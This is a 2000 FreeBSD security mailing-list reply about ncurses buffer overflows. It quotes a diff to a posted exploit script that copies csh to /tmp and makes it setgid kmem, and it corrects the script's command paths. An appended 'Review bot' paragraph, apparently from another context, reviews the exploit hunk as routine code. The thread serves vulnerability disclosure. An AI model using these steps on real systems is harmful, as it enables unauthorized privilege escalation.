Date: Tue, 10 Oct 2000 17:58:35 -0700
From: Steve Reid <sreid@sea-to-sky.net>
To: Mike Silbersack <silby@silby.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001010175835.E9112@grok>
In-Reply-To: <20001010175013.D9112@grok>; from Steve Reid on Tue, Oct 10, 2000 at 05:50:13PM -0700
References: <20001010165908.C9112@grok> <Pine.BSF.4.21.0010101908580.4266-100000@achilles.silby.com> <20001010175013.D9112@grok>
On Tue, Oct 10, 2000 at 05:50:13PM -0700, Steve Reid wrote:
> --- exploit.csh.orig Tue Oct 10 17:42:49 2000 +++ exploit.csh Tue Oct 10 17:46:53 2000 > @@ -11,7 +11,7 @@ > #!/bin/csh > > cp /bin/csh /tmp > -/usr/sbin/chown venglin.kmem /tmp/csh > +chgrp kmem /tmp/csh > chmod 2755 /tmp/csh > __EOF__

BTW, the above is relative to the exploit Przemyslaw Frasunek posted to bugtraq. The one he posted to freebsd-security, the line was:

/usr/sbin/chgrp kmem /tmp/csh

Which also doesn't work because chgrp is in /usr/bin, not /usr/sbin.

This just goes to show, that just because an exploit script doesn't work for you, doesn't mean that you are not vulnerable. Assume the worst!
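Review bot: in the quoted hunk, the `+chgrp kmem /tmp/csh` line changes more than the path of the removed `/usr/sbin/chown venglin.kmem /tmp/csh`: chown with `venglin.kmem` set both owner and group, while chgrp sets only the group, so the owner of /tmp/csh is now whoever ran the `cp`. The patch carries no description, so it should state that dropping the hard-coded `venglin` owner is intended. The replacement is also unqualified where the removed line used an absolute path, which makes the result depend on the PATH of the shell that runs the script; a one-line comment on that choice would help anyone reading the patch.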